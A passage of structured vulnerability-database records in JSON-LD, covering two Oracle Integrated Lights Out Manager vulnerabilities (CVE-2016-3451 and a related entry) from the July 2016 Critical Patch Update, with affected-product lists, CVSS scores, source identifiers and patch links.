trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic 
infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", 
scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: 
"application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", 
version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92022", }, { db: "JVNDB", id: "JVNDB-2016-003866", }, { db: "CNNVD", id: "CNNVD-201607-660", }, { db: "NVD", id: "CVE-2016-3451", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/o:oracle:integrated_lights_out_manager_firmware", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-003866", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92022", }, ], trust: 0.6, }, cve: "CVE-2016-3451", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": 
"https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "NONE", baseScore: 4.3, confidentialityImpact: "NONE", exploitabilityScore: 8.6, id: "CVE-2016-3451", impactScore: 2.9, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 1.9, vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N", version: "2.0", }, { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "NONE", baseScore: 4.3, confidentialityImpact: "NONE", exploitabilityScore: 8.6, id: "VHN-92270", impactScore: 2.9, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 0.1, vectorString: "AV:N/AC:M/AU:N/C:N/I:P/A:N", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "NONE", baseScore: 4.7, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", exploitabilityScore: 2.8, id: "CVE-2016-3451", impactScore: 1.4, integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", trust: 1.8, userInteraction: "REQUIRED", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-3451", trust: 1, value: "MEDIUM", }, { author: "NVD", id: "CVE-2016-3451", trust: 0.8, value: "Medium", }, { author: "CNNVD", id: "CNNVD-201607-660", trust: 0.6, value: "MEDIUM", }, { author: "VULHUB", id: "VHN-92270", trust: 0.1, value: "MEDIUM", }, { author: "VULMON", id: "CVE-2016-3451", trust: 0.1, value: "MEDIUM", }, ], }, ], 
sources: [ { db: "VULHUB", id: "VHN-92270", }, { db: "VULMON", id: "CVE-2016-3451", }, { db: "JVNDB", id: "JVNDB-2016-003866", }, { db: "CNNVD", id: "CNNVD-201607-660", }, { db: "NVD", id: "CVE-2016-3451", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect integrity via vectors related to Web. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border 
Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. \nThe vulnerability can be exploited over the 'HTTP' protocol. 
The 'Web' sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. A remote attacker could exploit this vulnerability to update, insert, or delete data, affecting data integrity", sources: [ { db: "NVD", id: "CVE-2016-3451", }, { db: "JVNDB", id: "JVNDB-2016-003866", }, { db: "BID", id: "91787", }, { db: "BID", id: "92022", }, { db: "VULHUB", id: "VHN-92270", }, { db: "VULMON", id: "CVE-2016-3451", }, ], trust: 2.34, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-3451", trust: 2.9, }, { db: "BID", id: "91787", trust: 1.5, }, { db: "BID", id: "92022", trust: 1.5, }, { db: "SECTRACK", id: "1036408", trust: 1.2, }, { db: "JVNDB", id: "JVNDB-2016-003866", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201607-660", trust: 0.7, }, { db: "VULHUB", id: "VHN-92270", trust: 0.1, }, { db: "VULMON", id: "CVE-2016-3451", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-92270", }, { db: "VULMON", id: "CVE-2016-3451", }, { db: "BID", id: "91787", }, { db: "BID", id: "92022", }, { db: "JVNDB", id: "JVNDB-2016-003866", }, { db: "CNNVD", id: "CNNVD-201607-660", }, { db: "NVD", id: "CVE-2016-3451", }, ], }, id: "VAR-201607-0587", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-92270", }, ], trust: 0.01, }, last_update_date: "2024-11-23T20:32:31.790000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Oracle Critical Patch Update Advisory - July 2016", trust: 0.8, url: 
"http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "Oracle Sun Systems Products Suite ILOM Fixes for component security vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63020", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, ], sources: [ { db: "VULMON", id: "CVE-2016-3451", }, { db: "JVNDB", id: "JVNDB-2016-003866", }, { db: "CNNVD", id: "CNNVD-201607-660", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "NVD-CWE-noinfo", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2016-3451", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.5, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.3, url: "http://www.securityfocus.com/bid/92022", }, { trust: 1.2, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.2, url: "http://www.securitytracker.com/id/1036408", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3451", }, { trust: 0.8, url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-3451", }, { trust: 0.3, url: "http://www.oracle.com", }, { trust: 0.3, url: 
"http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://www.oracle.com/index.html", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=47152", }, ], sources: [ { db: "VULHUB", id: "VHN-92270", }, { db: "VULMON", id: "CVE-2016-3451", }, { db: "BID", id: "91787", }, { db: "BID", id: "92022", }, { db: "JVNDB", id: "JVNDB-2016-003866", }, { db: "CNNVD", id: "CNNVD-201607-660", }, { db: "NVD", id: "CVE-2016-3451", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-92270", }, { db: "VULMON", id: "CVE-2016-3451", }, { db: "BID", id: "91787", }, { db: "BID", id: "92022", }, { db: "JVNDB", id: "JVNDB-2016-003866", }, { db: "CNNVD", id: "CNNVD-201607-660", }, { db: "NVD", id: "CVE-2016-3451", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-07-21T00:00:00", db: "VULHUB", id: "VHN-92270", }, { date: "2016-07-21T00:00:00", db: "VULMON", id: "CVE-2016-3451", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "92022", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003866", }, { date: "2016-07-22T00:00:00", db: "CNNVD", id: "CNNVD-201607-660", }, { date: "2016-07-21T10:12:15.067000", db: "NVD", id: "CVE-2016-3451", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2017-09-01T00:00:00", db: "VULHUB", id: "VHN-92270", }, { date: "2017-09-01T00:00:00", 
db: "VULMON", id: "CVE-2016-3451", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "92022", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003866", }, { date: "2016-07-22T00:00:00", db: "CNNVD", id: "CNNVD-201607-660", }, { date: "2024-11-21T02:50:02.070000", db: "NVD", id: "CVE-2016-3451", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92022", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle Sun Systems Products Suite of ILOM In Web Vulnerabilities", sources: [ { db: "JVNDB", id: "JVNDB-2016-003866", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92022", }, ], trust: 0.6, }, }
var-201607-0652
Vulnerability from variot
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. A denial-of-service (DoS) attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update as a whole addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle Documaker Oracle 
Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'Multiple' protocol. The 'Authentication' sub component is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0652", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", 
